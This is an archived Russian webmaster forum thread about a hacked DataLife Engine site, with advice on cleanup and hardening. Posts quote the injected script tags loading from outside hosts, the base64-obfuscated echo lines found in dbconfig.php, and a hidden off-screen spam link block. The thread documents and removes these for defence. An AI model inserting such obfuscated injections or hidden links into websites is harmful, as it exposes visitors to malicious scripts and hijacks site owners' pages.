Перейти к публикации

Атакован сайт


alex4526

Рекомендованные сообщения

Здравствуйте. Сегодня утром обнаружил, что оказывается на сайте уже 3 админа ( вместе со мною).Естественно принял меры. Двоих удалил. Поменял пароль ну и другие меры. Также обнаружил, что в шапке сайта прописан код <script language="JavaScript" type="text/javascript" charset="windows-1251" src="http://tizmax.ru/codes/iframe.php?id=90"></script><script language="JavaScript" charset="windows-1251" rel="nofollow" src="http://traffikk.biz/js/if.php?id=7514"></script>.Кто сталкивался с этой проблемой подскажите как удалить эту заразу.

Заранее благодарен.

Ссылка на сообщение
Поделиться на других сайтах

Для начала смените пароли на хостинговую панель управления, БД, ФТП и админку. Больше тут ничего не посоветуешь.

Удалите лишний код вручную из шаблонов.

Ссылка на сообщение
Поделиться на других сайтах

Для начала смените пароли на БД, ФТП и админку. Больше тут ничего не посоветуешь.

Удалите лишний код вручную из шаблонов.

Спасибо. Сейчас этим и занимаюсь. Про результаты отпишусь. Чувствую скоро те только у меня эта проблема возникнет.

Ссылка на сообщение
Поделиться на других сайтах

Спасибо. Сейчас этим и занимаюсь. Про результаты отпишусь. Чувствую скоро те только у меня эта проблема возникнет.

И не забудьте поставить патчи http://dle-news.ru/bags/

Ссылка на сообщение
Поделиться на других сайтах

Проверил бы файлы config.php,dbconfig.php а также все файлы через которые можно на главную вывести код, а также прошелся бы по ява скриптам, установил бы ZEOS ANTIVIRUS очень полезная вещь.

Убрал бы права на запись, оставив 444, это ты уже сам догадаешься.

Ссылка на сообщение
Поделиться на других сайтах

Проверил бы файлы config.php,dbconfig.php а также все файлы через которые можно на главную вывести код, а также прошелся бы по ява скриптам, установил бы ZEOS ANTIVIRUS очень полезная вещь.

Убрал бы права на запись, оставив 444, это ты уже сам догадаешься.

Победа за нами. Код найден, удален.

1. В папке templates файл sistem.php вирус.

2. В файле dbconfig.php код

echo base64_decode ('PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCIgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBjaGFyc2V0PSJ3aW5kb3dzLTEyNTEiIHNyYz0iaHR0cDovL3Rpem1heC5ydS9jb2Rlcy9pZnJhbWUucGhwP2lkPTkwIj48L3NjcmlwdD4=');

echo base64_decode ('PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCIgY2hhcnNldD0id2luZG93cy0xMjUxIiByZWw9Im5vZm9sbG93IiBzcmM9Imh0dHA6Ly90cmFmZmlray5iaXovanMvaWYucGhwP2lkPTc1MTQiPjwvc2NyaXB0Pg==');

Вывод: Надо больше внимания уделять безопасности сайта.

Ссылка на сообщение
Поделиться на других сайтах

Вывод: Надо больше внимания уделять безопасности сайта.

Надо вовремя обновляться и ставить патчи.

Ссылка на сообщение
Поделиться на других сайтах

n0lik,

В паблике к сожалению не все патчи, обычно узнав уязвимость, заплатка распространяется только среди своего круга лиц. Самый лучший способ по-моему это основательно поработать над chmod а также закрытием портов на хосте. В таком случае если даже есть залитый шелл на сайт, то смысл его использовать пропадает, если везде по умному расставлены права на запись.

Ссылка на сообщение
Поделиться на других сайтах

n0lik,

В паблике к сожалению не все патчи, обычно узнав уязвимость, заплатка распространяется только среди своего круга лиц. Самый лучший способ по-моему это основательно поработать над chmod а также закрытием портов на хосте. В таком случае если даже есть залитый шелл на сайт, то смысл его использовать пропадает, если везде по умному расставлены права на запись.

скажите тогда как будет вести себя веб шелл в папке /engine/ если злоумышленник залил его по фтп?

Тут уже никакие права доступа и прочее НЕПОМОЖЕТ, имхо права для доступа\записи это только часть.

Защищаться нужно не от взломщика а нужно защищать своё железо от вирусов. не более.

Ссылка на сообщение
Поделиться на других сайтах

Победа за нами. Код найден, удален.

Это не надолго, вам же написали, что ставьте патчи http://dle-news.ru/bags/ а вы этого до сих пор не сделали.

Ссылка на сообщение
Поделиться на других сайтах

таже фигня :) Наглые рожи прям в главную страницу вставили

<html><div style="position:absolute;top:-1000px;left:-1000px"><a href="http://new.turbinist.ru/uploads/images/index.html">Главная</a><br><a href="http://mysite.ru/uploads/images/sitemap.html">Знакомства любовь секс</a><br><a href="http://mysite.ru/uploads/images/minsk-znakomstva-devushki.html">Минск знакомства девушки</a><br><a href="http://mysite.ru/uploads/images/krivoy-rog-intim-znakomstva.html">Кривой рог интим знакомства</a><br></div></html>

</html>

в папку upload залили папку image,а в ней не поверите .html файлов аж на 27 метров :D :D :D :D :D и все про порно)). точно прийдется код доступа в панель хостинга))

Ссылка на сообщение
Поделиться на других сайтах

Архивировано

Эта тема находится в архиве и закрыта для публикации сообщений.

×
×
  • Создать...